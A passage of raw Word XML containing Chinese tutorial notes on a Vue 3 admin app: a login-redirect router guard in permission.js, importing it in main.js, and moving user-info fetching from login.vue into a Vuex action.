        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有登录，强制跳转到登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43264D50" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(!token &amp;&amp; to.path != "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70D67F" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E19736" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: "/login" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772BA9F" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E54F5" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBE03C3" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止重复登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA311A0" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(token &amp;&amp; to.path == "/login"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE81365" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿重复登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3CF5AA" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: from.path? from.path: "/" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A94AC9" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A6B432" w14:textId="77777777" w:rsidR="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765BBE53" w14:textId="77777777" w:rsidR="00790304" w:rsidRPr="00790304" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005F48AA" w14:textId="38A16007" w:rsidR="00BF31AD" w:rsidRDefault="00790304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790304">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627344BF" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B214CEB" w14:textId="481A4B8E" w:rsidR="00BF31AD" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用该路由设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA52572" w14:textId="77777777" w:rsidR="00833651" w:rsidRPr="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6AF618" w14:textId="1C873096" w:rsidR="00833651" w:rsidRPr="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pp.mount()</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>之前，</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00833651">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ermission.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FFAF7" w14:textId="77777777" w:rsidR="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import "./permission"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FBC680" w14:textId="77777777" w:rsidR="00833651" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4790D36C" w14:textId="03FADE37" w:rsidR="00BF31AD" w:rsidRDefault="00833651" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.mount('#app')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BC069" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE13E61" w14:textId="35B4683E" w:rsidR="00BF31AD" w:rsidRDefault="003B7D49" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="_Toc159780129"/>
      <w:r w:rsidRPr="003B7D49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>登录功能完善</w:t>
      </w:r>
      <w:bookmarkEnd w:id="699"/>
    </w:p>
    <w:p w14:paraId="0F22FEF6" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C9BD02D" w14:textId="5D5F628F" w:rsidR="00BF31AD" w:rsidRDefault="00584CF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决之前的问题，获取用户信息（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（））后，当下会显示用户信息，但是页面一刷新就没有了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD920D7" w14:textId="77777777" w:rsidR="00584CF9" w:rsidRDefault="00584CF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC584EB" w14:textId="212D77A5" w:rsidR="00584CF9" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在要，只要每次登陆成功，之后默认访问首页，不论怎么刷新，都要有内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB2FF91" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766B6ED9" w14:textId="0B944945" w:rsidR="00B57CE7" w:rsidRDefault="00B57CE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决内容留存问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF1A47" w14:textId="77777777" w:rsidR="00B57CE7" w:rsidRDefault="00B57CE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6F525A" w14:textId="7B8C7E42" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E19A7" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320A7A18" w14:textId="19FAFD69" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先注释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getinfo(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE04D48" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3140B6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { login, getinfo } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AE433" w14:textId="6E8C5371" w:rsidR="00BF31AD" w:rsidRPr="00181907" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { login } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1C46E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取用户相关信息，改放在</w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>src/permission.js</w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10096922" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54130788" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //     .then(res2 =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914D680" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //         store.commit("SET_USERINFO", res2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75F47F" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //         console.log(res2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23914BC6" w14:textId="5B3179B0" w:rsidR="00BF31AD" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //     })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814BD34" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EAB384C" w14:textId="2B06C72A" w:rsidR="00BF31AD" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:t>/index.js:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BB598" w14:textId="2EE9625E" w:rsidR="00BF31AD" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584357F6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103BCC29" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { createStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113ECBA" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { login, getinfo } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D7F60" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BC5D9F" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606044C6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = createStore({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B399E" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    state() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E4C7F" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6985C4" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DA40A" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            user: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB0CF2" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC5664" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4AEFD3" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mutations: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF6603" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445984AA" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        SET_USERINFO(state, user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39434619" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            state.user = user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E50CD7" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A7331" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191E588" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>actions: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F7E3B" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取当前登录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A5F99" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        getinfo({ commit }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7232F7" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A2B63" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF3FF8" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001329A4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
